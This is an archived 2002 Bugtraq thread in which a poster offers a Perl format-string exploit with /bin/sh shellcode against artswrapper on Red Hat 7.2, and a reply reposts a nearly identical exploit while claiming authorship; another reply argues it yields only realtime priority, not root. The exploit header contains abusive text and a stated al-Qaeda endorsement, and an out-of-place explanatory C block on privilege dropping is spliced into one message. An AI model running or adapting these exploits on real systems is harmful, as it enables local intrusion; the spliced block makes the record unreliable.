8699348 2002-07-06 15:45 -0000  /13 lines/ kanix THE HACKER <kanix@twinkie.com>
Sent by: joel@lysator.liu.se
Imported: 2002-07-07  23:44  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
External recipient: vuln-dev@securityfocus.com
External recipient: submissions@packetstormsecurity.org
Recipient: Bugtraq (import) <22973>
Subject: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
------------------------------------------------------------
From: "kanix THE HACKER" <kanix@twinkie.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
 vuln-dev@securityfocus.com, submissions@packetstormsecurity.org
Message-ID: <20020706194517.27759.qmail@inbox.net>

Greetings,

This is a local exploit for a format string vulnerability in
/usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma).

Sincerely,

kanix
(8699348) /kanix THE HACKER <kanix@twinkie.com>/(Rewrapped)
Attachment (text/x-perl) in text 8699349
Comment in text 8702710 by Olaf Kirch <okir@suse.de>
Comment in text 8703241 by KF <dotslash@snosoft.com>
8699349 2002-07-06 15:45 -0000  /116 lines/ kanix THE HACKER <kanix@twinkie.com>
Attachment filename: "fartsy.pl"
Imported: 2002-07-07  23:44  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
External recipient: vuln-dev@securityfocus.com
External recipient: submissions@packetstormsecurity.org
Recipient: Bugtraq (import) <22974>
Attachment (text/plain) to text 8699348
Subject: Attachment (fartsy.pl) to: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
------------------------------------------------------------
#!/usr/bin/perl

########################################################################
#
#	fartsy.pl by kanix <kanix@0xfee1dead.net>
#		/usr/sbin/artswrapper <local format string exploit>
#			Tested on Red Hat Linux release 7.2 (Enigma)
#
#	Jul 6, 2002
#
# 	"the secret to creativity is knowing how to hide your sources."
#		- Albert Einstein
#
# commentz, job offerz, flamez, etc. should be directed to my e-mail
# address -- I WILL SCHOOL YOU ALL.
#
# SCREW THE USA! FEAR THE POWER OF .NO !@#$%!
#	official supporter of the al-Qaeda Terrorist Network.
#
# BURN, BABY, BURN!!!
#
# I 0xc0ded this for fun and profit... and to get scene whorez. ;>
#
# This code is far from special - my mother could have written it,
# however, that is the extent of my ability.
#
# I can code sploits, but I know nothing of UNC file sharing! I'm
# still very 0x1337. I mean, I can code exploits, that's what makes
# you a hacker!
#
# SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,
# there are enuff retardz in the hacker scene already (LIKE ME ;>)!
#
# Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,
#         security.is, #hackphreak, teleh0r (fame seeking whore like
#         me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO
#         AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!)
#
# kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!
#
# kanix: can some1 pleeze tell me about DNS cache poisoning?
#
########################################################################

$kode =
  "\x31\xdb".                 # xor ebx, ebx
  "\xf7\xe3".                 # mul ebx
  "\xb0\x17".                 # mov al, 0x17
  "\xcd\x80".                 # int 0x80
  "\x31\xc0".                 # xor  eax, eax
  "\x99".                     # cdq
  "\x52".                     # push edx
  "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
  "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
  "\x89\xe3".                 # mov  ebx, esp
  "\x52".                     # push edx
  "\x53".                     # push ebx
  "\x89\xe1".                 # mov  ecx, esp
  "\xb0\x0b".                 # mov  al, 0x0b
  "\xcd\x80";                 # int  0x80

$vuln    = "/usr/bin/artswrapper";
$dtors   = 0x8049a7c + 4; # I overwrite .dtors! (patent pending)

printf("\n-- /usr/bin/artswrapper local format string exploit\n");
printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");

$ret_addr = 0xc0000000 - 4
    - (length($vuln) + 1)
    - (length($kode) + 1)
    ;

undef(%ENV); $ENV{'1337'} = $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);

for (1 .. 300) {
    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    die("\x0a") if (system("$vuln -a $fmt_str"))
        =~ m/^(0|256|512|32512)$/;
}

sub
sw_fmtstr_create ($$$)
{
    die("Incorrect number of arguments for sw_fmtstr_create")
        unless @_ == 3;

    my ($dest_addr, $ret_addr, $dist) = @_;
    my ($word, $qword) = (2, 8);

    $tmp1  = (($ret_addr >> 16) & 0xffff);
    $tmp2  = $ret_addr & 0xffff;

    if ($tmp1 < $tmp2) {
        $high = $tmp1 - $qword;
        $low  = $tmp2 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr + $word);
        $dest_addr2 = pack('L', $dest_addr);
    }
    else {
        $high = $tmp2 - $qword;
        $low  = $tmp1 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr);
        $dest_addr2 = pack('L', $dest_addr + $word);
    }

    sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
            $dest_addr1, $dest_addr2, $high, $dist,
            $low, $dist + 1);
}
(8699349) /kanix THE HACKER <kanix@twinkie.com>/----
8702710 2002-07-08 13:03 +0200  /55 lines/ Olaf Kirch <okir@suse.de>
Sent by: joel@lysator.liu.se
Imported: 2002-07-08  18:38  by Brevbäraren
External recipient: kanix THE HACKER <kanix@twinkie.com>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: vulnwatch@vulnwatch.org
External CC recipient: vuln-dev@securityfocus.com
External CC recipient: submissions@packetstormsecurity.org
Recipient: Bugtraq (import) <22980>
Comment on text 8699348 by kanix THE HACKER <kanix@twinkie.com>
Subject: Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
------------------------------------------------------------
From: Olaf Kirch <okir@suse.de>
To: kanix THE HACKER <kanix@twinkie.com>
Cc: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
 vuln-dev@securityfocus.com, submissions@packetstormsecurity.org
Message-ID: <20020708130304.G15149@wotan.suse.de>

Disclaimer - I investigated this issue on SuSE, not RedHat, so
the situation there may be somewhat different.

On Sun, Jul 07, 2002 at 09:43:06PM +0000, kanix THE HACKER wrote:
> This is a local exploit for a format string vulnerability in
> /usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma).

Hm. I am not quite sure why this exploit should give you a root shell
(unless RedHat made artsd setuid root, too).

artswrapper does a seteuid(getuid()) which sets the effective uid back
to that of the caller. Then it calls execv(/opt/.../artsd).  The execv
call takes care of the saved uid. So what you get is a shell running
with realtime scheduling priority, but no root privilege.

For what it's worth, there are simpler methods to obtain a process
with RT-privilege using artsd. Compile the attached program as
/tmp/lalla and check:

	$ artswrapper -m /tmp/lalla -a foo
	>> running as realtime process now (priority 50)
	Current scheduling policy is FIFO

Which is disturbing, but a far cry from root privileges as claimed
in the original posting.

Apart from that, artsd has a load of other ways to break it. Unchecked
vsprintf calls in arts/mcop/debug.cc for instance. But given that
artsd is linked against 16 shared libraries I'm sure there are
at least that many different ways to exploit it.

Fortunately, KDE seems to have picked up the habit of protecting the
directory in which the mcop communication socket resides so that
no-one except the user running artsd can connect.

If I am not mistaken, the original intention of giving artsd realtime
scheduling policy was to make sure that sound data was being
fed to the sound device with a low latency; which is important for
many sound cards which have ridiculously small buffers. It seems
though that artsd has mutated into something much bigger in the
meantime; maybe it's time to consider whether one shouldn't split
off the part feeding the audio device...

Olaf
-- 
Olaf Kirch     |  Anyone who has had to work with X.509 has probably
okir@suse.de   |  experienced what can best be described as
---------------+  ISO water torture. -- Peter Gutmann
(8702710) /Olaf Kirch <okir@suse.de>/-----(Rewrapped)
Attachment (text/plain) in text 8702711
8702711 2002-07-08 13:03 +0200  /18 lines/ Olaf Kirch <okir@suse.de>
Imported: 2002-07-08  18:38  by Brevbäraren
External recipient: kanix THE HACKER <kanix@twinkie.com>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: vulnwatch@vulnwatch.org
External CC recipient: vuln-dev@securityfocus.com
External CC recipient: submissions@packetstormsecurity.org
Recipient: Bugtraq (import) <22981>
Attachment (text/plain) to text 8702710
Subject: Attachment to: Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
------------------------------------------------------------
#include <stdio.h>
#include <sched.h>

int main()
{
	int sched = sched_getscheduler(0);
	const char *name = "unknown";

	switch (sched) {
	case SCHED_FIFO: name = "FIFO"; break;
	case SCHED_RR: name = "RR"; break;
	case SCHED_OTHER: name = "OTHER"; break;
	}

	printf("Current scheduling policy is %s\n", name);
	return 0;
}
(8702711) /Olaf Kirch <okir@suse.de>/---------------
8703241 2002-06-12 22:24 -0700  /264 lines/ KF <dotslash@snosoft.com>
Sent by: joel@lysator.liu.se
Imported: 2002-07-08  20:36  by Brevbäraren
External recipient: kanix THE HACKER <kanix@twinkie.com>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: vuln-dev@securityfocus.com
External CC recipient: vulnwatch@vulnwatch.org
External CC recipient: submissions@packetstormsecurity.org
Recipient: Bugtraq (import) <22983>
Comment on text 8699348 by kanix THE HACKER <kanix@twinkie.com>
Subject: Re: LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
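As an added example (not code from Olaf's post, artswrapper or KDE), a small C program illustrating the privilege-drop point made above: seteuid(getuid()) in a setuid-root wrapper leaves the saved set-user-ID as root, so it is only a temporary drop until the exec resets it, whereas a wrapper that keeps running needs setuid(getuid()) to drop all three uids. The function names are my own; the self-check also behaves sensibly when run as an ordinary user.

```c
/* Added example: temporary vs. permanent privilege drop in a wrapper. */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* The artswrapper-style drop: only the effective uid changes. The saved
 * set-user-ID is still 0, so seteuid(0) remains possible until the
 * process execs (exec sets the saved uid to the current effective uid,
 * which is why the drop-then-execv pattern ends up without root). */
int drop_privs_temporarily(void)
{
    return seteuid(getuid());
}

/* For a wrapper that keeps running instead of exec'ing: with effective
 * uid 0, setuid() sets real, effective and saved uid, so there is no
 * way back. For an unprivileged caller setuid() only touches the
 * effective uid, hence the explicit geteuid() check afterwards. */
int drop_privs_permanently(void)
{
    uid_t uid = getuid();
    if (setuid(uid) != 0)
        return -1;
    return (geteuid() == uid) ? 0 : -1;
}

/* 1 if the process can (still) run as root, 0 otherwise. */
int can_regain_root(void)
{
    if (getuid() == 0 && geteuid() == 0)
        return 1;
    if (seteuid(0) == 0) {        /* succeeded: saved uid was still 0 */
        seteuid(getuid());        /* put the effective uid back */
        return 1;
    }
    return 0;
}

/* 0 if a permanent drop leaves no path back to root, -1 otherwise.
 * A caller whose real uid is 0 has nothing to drop and gets 0. */
int verify_permanent_drop(void)
{
    if (getuid() == 0)
        return 0;
    if (drop_privs_permanently() != 0)
        return -1;
    return can_regain_root() ? -1 : 0;
}

int main(void)
{
    if (geteuid() == 0 && getuid() != 0) {   /* setuid-root binary case */
        drop_privs_temporarily();
        printf("after seteuid(getuid()): root regainable = %d\n",
               can_regain_root());
    }
    printf("permanent drop irreversible: %s\n",
           verify_permanent_drop() == 0 ? "yes" : "NO");
    return 0;
}
```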
------------------------------------------------------------
From: "KF" <dotslash@snosoft.com>
To: "kanix THE HACKER" <kanix@twinkie.com>
Cc: <bugtraq@securityfocus.com>, <vuln-dev@securityfocus.com>,
 <vulnwatch@vulnwatch.org>, <submissions@packetstormsecurity.org>
Message-ID: <000201c212ef$5f9e2a80$0201000a@k7ezizjvt9gjdv>

Heh looks like I fell asleep on releasing this one... and it looks
like the posted code was actually code from our labs (credit where
it's due please)...just so you are aware the issue is really in artsd
which is NOT suid ... you should get a shell with your own
privs... Here's where that code really came from....

[root@ghetto dotslash]# artswrapper -a %x
>> running as realtime process now (priority 50)
Error while initializing the sound driver:
unable to select 'bffffa40' style audio I/O
[root@ghetto dotslash]# ls -al `which artswrapper`
-rwsr-sr-x    1 root     root         4136 Sep  8  2001 /usr/bin/artswrapper
[root@ghetto dotslash]# ls -al `which artsd`
-rwxr-xr-x    1 root     root       115284 Sep  8  2001 /usr/bin/artsd
[root@ghetto dotslash]# artsd -a %x
Error while initializing the sound driver:
unable to select 'bffffa80' style audio I/O


[dotslash@ghetto dotslash]$ cat /etc/hackme/done/artswrapex.pl
#!/usr/bin/perl

## ---/ artswrapex.pl /------------------------------------------------
##
## /usr/bin/artswrapper local format string exploit
##   * tested on Red Hat Linux release 7.2 (Enigma)
##   * Jun 17 2002
##
## Author: stringz // thc@drug.org
##
## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com
##
## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
##         obscure, jove, rachel, kevin, and all of my 2e2h friends.
##
## ---/ powered by pot /-----------------------------------------------

# setuid + execve shellcode
$kode =
  "\x31\xdb".                 # xor ebx, ebx
  "\xf7\xe3".                 # mul ebx
  "\xb0\x17".                 # mov al, 0x17
  "\xcd\x80".                 # int 0x80
  "\x31\xc0".                 # xor  eax, eax
  "\x99".                     # cdq
  "\x52".                     # push edx
  "\x68\x2f\x2f\x73\x68".     # push dword 0x68732f2f
  "\x68\x2f\x62\x69\x6e".     # push dword 0x6e69622f
  "\x89\xe3".                 # mov  ebx, esp
  "\x52".                     # push edx
  "\x53".                     # push ebx
  "\x89\xe1".                 # mov  ecx, esp
  "\xb0\x0b".                 # mov  al, 0x0b
  "\xcd\x80";                 # int  0x80

$vuln    = "/usr/bin/artswrapper";
$dtors   = 0x8049a7c + 4;

printf("\n-- /usr/bin/artswrapper local format string exploit\n");
printf("-- stringz // thc\@drug.org\n\n");

$ret_addr = 0xc0000000 - 4
    - (length($vuln) + 1)
    - (length($kode) + 1)
    ;

undef(%ENV); $ENV{'1337'} = $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);

for (1 .. 300) {
    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    die("\x0a") if (system("$vuln -a $fmt_str"))
        =~ m/^(0|256|512|32512)$/; # may need a tweak ;)
}

sub
sw_fmtstr_create ($$$)
{
    die("Incorrect number of arguments for sw_fmtstr_create")
        unless @_ == 3;

    my ($dest_addr, $ret_addr, $dist) = @_;
    my ($word, $qword) = (2, 8);

    # $dest_addr = where to write $ret_addr
    # $ret_addr  = where to return execution
    # $dist      = the calculated distance

    $tmp1  = (($ret_addr >> 16) & 0xffff);
    $tmp2  = $ret_addr & 0xffff;

    if ($tmp1 < $tmp2) {
        $high = $tmp1 - $qword;
        $low  = $tmp2 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr + $word);
        $dest_addr2 = pack('L', $dest_addr);
    }
    else {
        $high = $tmp2 - $qword;
        $low  = $tmp1 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr);
        $dest_addr2 = pack('L', $dest_addr + $word);
    }

    sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
            $dest_addr1, $dest_addr2, $high, $dist,
            $low, $dist + 1);
}

-KF


(8703241) /KF <dotslash@snosoft.com>/-----(Rewrapped)